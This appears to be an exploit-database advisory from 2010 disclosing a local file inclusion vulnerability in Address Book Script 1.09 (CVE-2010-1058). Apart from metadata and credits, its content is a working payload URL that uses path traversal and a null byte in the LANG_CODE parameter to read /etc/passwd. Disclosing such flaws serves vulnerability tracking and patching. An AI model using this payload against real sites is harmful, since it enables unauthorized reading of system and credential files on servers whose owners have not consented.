[] NeoSense

Address Book Script 1.09 - Local File Inclusion

Author: Pouya Daneshmand
type: webapps
platform: php
port: 
date_added: 2010-03-14 
date_updated:  
verified: 1 
codes: OSVDB-63003;CVE-2010-1058 
tags: 
aliases:  
screenshot_url:  
application_url: 

#################################################################
# Securitylab.ir
#################################################################
# Application Info:
# Name: Address Book Script
# Version: 1.9
# Vendor: http://www.phpkobo.com/address_book.php
#################################################################
# Vulnerability Info:
# Type: Local File Inclusion
# Risk: Medium
#################################################################
Vulnerability:
http://site.com/codelib/cfg/common.inc.php?LANG_CODE=../../../../../../etc/passwd%00

#################################################################
# Discoverd By: Pouya Daneshmand
# Website: http://securitylab.ir
# Contacts: info[at]securitylab.ir & whh_iran[at]yahoo.com
###################################################################